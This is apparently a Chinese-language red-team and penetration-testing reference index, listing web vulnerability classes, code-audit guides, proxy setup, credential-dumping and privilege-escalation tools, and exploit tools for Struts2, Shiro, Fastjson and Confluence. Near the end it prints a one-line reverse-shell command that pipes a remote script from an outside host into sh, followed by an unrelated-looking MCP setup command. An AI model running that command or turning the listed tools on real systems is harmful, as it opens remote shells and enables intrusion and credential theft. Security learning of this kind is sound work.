【声明】个人的快速查询目录,经验整理,仅供参考。
【内容】包括个人对漏洞理解、漏洞利用、代码审计和渗透测试的整理,也收录了他人相关的知识的总结和工具的推荐。
依照红队的流程分工,选择适合自己的技能栈发展。
越接近中心的能力点越贴近web技术栈,反之亦然。可以根据自身情况,选择技术栈的发展方向。

同源策略 & CSP & JOSNP - 跨域安全
应用分层 & 漏洞分类 - 错综复杂的后端逻辑及安全
爬取范围包括先知社区、安全客、Seebug Paper、跳跳糖、奇安信攻防社区、棱角社区 - [Tool] 推送安全情报爬虫@Le0nsec
XSS 利用的是用户对指定网站的信任 - Cross Site Scripting (XSS) ### 2.2 前端安全-CSRF CSRF 利用的是网站对用户网页浏览器的信任
- Client-side request forgery (CSRF)
MySQL,Oracle,MSSQL和PostgreSQL的OOB方法
go写的命令行版本
程序检测参数不能为空,导致空口令无法利用
MVC架构中,模板参数恶意输入产生的安全问题 - STTI 总述 - SSTI -Python - SSTI -PHP - SSTI Payload @payloadbox
XPath 即为 XML 路径语言 - XPath Injection
远古时期的通杀利器
php,java只能序列化数据,python可以序列化代码。
- 反序列化漏洞-PHP - 反序列化漏洞-Java - 绕过高版本Jdk的限制进行Jndi注入利用
- [Tool] 反序列化漏洞利用工具-Java ysoserial 拓展payload和内存马 - [Tool] 反序列化漏洞利用工具 Y4er 拓展payload和添加脏数据绕过waf功能(已删库) - ~[Tool] 反序列化漏洞利用工具 su18~
Confluence和Struct2都使用OGNL
按照清单做的配套工具
利用前后DNS解析的不一致(劫持或者逻辑问题)
- DNS rebinding 攻击 前后端不一致性 - 请求走私总结@chenjj
自己整理的PHP代码审计 - PHP代码审计手册 - PHP代码审计@bowu678 - PHP代码审计入门指南@burpheart
自己整理的Java代码审计 - Java代码审计手册 - Java代码审计@cn-panda - Java安全@Y4tacker - Java漏洞平台@j3ers3
Perl CGI快速上手,了解Perl语言特性 - Perl基础&代码审计@mi1k7ea
【流程】网络预置(准备&信息收集)-->网络接入(外网突破)-->权限获取和提升-->权限维持(后门)-->后渗透
【基础】---免杀+++反溯源+++协同---
操作系统 on VM + OpenWrt网关 on VM = 全局跳板 - 全局代理[VMware]:Openwrt on VMware网关方案
全局代理,虚拟网卡,需要手动配路由 - 全局代理[Win]:Windows下socks客户端全局代理终极解决方案——tun2socks
SSTap全局代理也是基于虚拟网卡方案,可惜已停止更新,推荐使用1.0.9.7版本 - [Tool] Windows下全局代理客户端工具 SSTap
【推荐!】Clash for Windows支持TAP模式基于虚拟网卡方案,走全局 - [Tool] Windows下全局代理客户端工具 Clash for Windows
Proxifier 全局代理支持并不好,可以设置规则选择指定程序走代理或直连 - [Tool] Windows下代理客户端工具 Proxifier
从移动端拓展目标信息 - [Tool] 移动端信息收集工具 AppInfoScanner
- [Tool] 安全分析框架 MobSF
高通410随身wifi改造 - 打造近源渗透工具
工欲其善必先利器
将Burpusuite打造成一个被动式扫描器
- [Tool] BurpSutie 插件集合@Mr-xn
IoT安全 & web安全& 系统漏洞 1day整理
oa - [Tool] 国内OA系统漏洞检测 struts2:利用功能已删除,仅支持检测 - [Tool] Struts2漏洞扫描&利用 struts2:GUI,功能齐全 - [Tool] Struts2漏洞扫描&利用 shiro:GUI,支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测 - [Tool] shiro反序列化漏洞利用 shiro:Python,方便修改代码,支持2种加密格式 - [Tool] shiro反序列化漏洞利用 fastjson - [Tool] Fastjson漏洞快速利用框架 fastjson:各类poc,方便手动测试 - Fastjson姿势技巧集合@safe6Sec exchange:爆破 - [Tool] EBurstGo Exchange 服务器 Web 接口爆破邮箱账户 confluence - [Tool] ConfluenceMemshell Confluence利用工具(CVE-2021-26084,CVE-2022-26134,CVE_2023_22515,CVE-2023-22527)
用于出网检测,无回显命令执行检测 - dnslog.cn - ceye 【推荐!】好用,开源 - requestrepo
权限获取:
离线|在线|破解 - Windows 认证凭证获取
- [Tool] mimikatz Windows认证凭证提取神器 - [Tool] go-secdump 利用smb远程无文件落地获取@jfjallid
提权:
- Windows提权检测工具 Windows Exploit Suggester
已经停止更新到CVE-2018 - Windows提权漏洞集合@SecWiki - PetitPotato for Win10 - CVE-2022-24481
权限获取:
- Linux 认证凭证获取
提权:
- Linux 提权检测脚本 lse.sh
- Linux setuid提权
已经停止更新到CVE-2018 - Linux提权漏洞集合@SecWiki
backdoor生成,meterpreter操作指令 - Meterpreter of Metasploit 使用教程
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
$ claude mcp add web-sec \
-- python -m otcore.mcp_server <graph>